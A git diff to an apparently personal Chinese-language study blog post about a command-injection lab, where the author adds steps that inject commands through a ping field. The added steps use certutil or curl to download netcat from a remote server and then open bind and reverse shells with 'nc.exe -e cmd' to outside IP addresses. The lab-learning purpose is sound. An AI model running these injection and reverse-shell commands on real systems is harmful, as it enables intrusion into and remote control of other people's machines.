--- a/docs/views/numerology/2025-01-12-CTFLearn.md
+++ b/docs/views/numerology/2025-01-12-CTFLearn.md
@@ -72,7 +72,7 @@ publish: true
 
 3. 通过下载的方式将nc送到这台Windows上。
 
-4. 我们拼接命令，用`IP+管道符+下载命令`的形式，视频中演示的是下载小迪提前准备好的服务器上的nc工具
+4. 我们拼接命令，用`IP+管道符+下载命令`的形式，视频中演示的是ping命令拼接cmd certuitl的下载方式，下载的是小迪提前准备好的服务器上的nc工具
 
    ```cmd
    127.0.0.1 | certutil.exe -urlcache -split -f http://47.94.346.117:80/nc.exe c:\\nc.exe
@@ -83,7 +83,7 @@ publish: true
    这里我们没有提前准备服务器，懒得找个服务器放这些，就用官方的下载地址凑活一下，也能用。我们换种方式，用`curl -O`的方式应该也是可以的，应该是通用的。
    
    ```cmd
-   127.0.0.1 | curl https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -o c:/Users/xxx/Desktop\netcat.zip
+   127.0.0.1 | curl https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -o c:\Users\xxx\Desktop\netcat.zip
    ```
    
    😶虽然成功下载了，但问题是从官网下载的是个安装包，还没解压，不好搞呀
@@ -91,8 +91,44 @@ publish: true
    😫还有个问题，我的虚拟机是以前的工作用的，这有当时公司的杀毒软件，下载的时候报了弹窗，好烦。
    
    没办法，只能重新装一个Win10的虚拟机了，这老东家的杀软卸不掉
+   
+5. 下载成功后，我们要考虑的是怎么解压到出来（视频中没有这一步骤，直接下载的nc.exe文件），用GPT生成了一段PowerShell代码试一下
 
-好累呀，重装了个系统，phpstudy和pikachu，好烦，今天先休息了
+   ```
+   $zipFile="C:\Users\Administrator\Desktop\netcat.zip";$destination="C:\Users\Administrator\Desktop";if(!(Test-Path -Path $destination)){New-Item -ItemType Directory -Path $destination};Expand-Archive -Path $zipFile -DestinationPath $destination | Out-File -FilePath C:\Users\Administrator\Desktop\result.txt
+   ```
+
+   多次尝试无果，都不能将压缩包解压，浪费太多时间了，准备直接进行下一步了。理论上感觉是可行的。
+
+6. 下一步是执行反弹操作，我们有两种方式，正向连接也就它监听我们连它，反向连接是主动把权限给我们
+
+   (1)我们先演示正向连接，用如下命令，将cmd绑定到5566端口：
+   
+   ```shell
+   127.0.0.1 | C:\\Users\Administrator\Desktop\nc.exe -e cmd -lvvp 5566 
+   ```
+   
+   我们控制端，要做的是连接这个受控端的IP地址和端口：
+   
+   ```shell
+   ncat 39.144.94.4 5566
+   ```
+   
+   (2)接下来想想怎么反向连接，用如下命令，讲cmd端口给到远程的控制端的IP地址和端口上去：
+   
+   ```shell
+   127.0.0.1 | C:\\Users\Administrator\Desktop\nc.exe -e cmd 39.144.94.5 5566
+   ```
+   
+   控制端做本地监听5566端口
+   
+   ```shell
+   ncat -lvvp 5566
+   ```
+   
+   
+
+
 
 
 
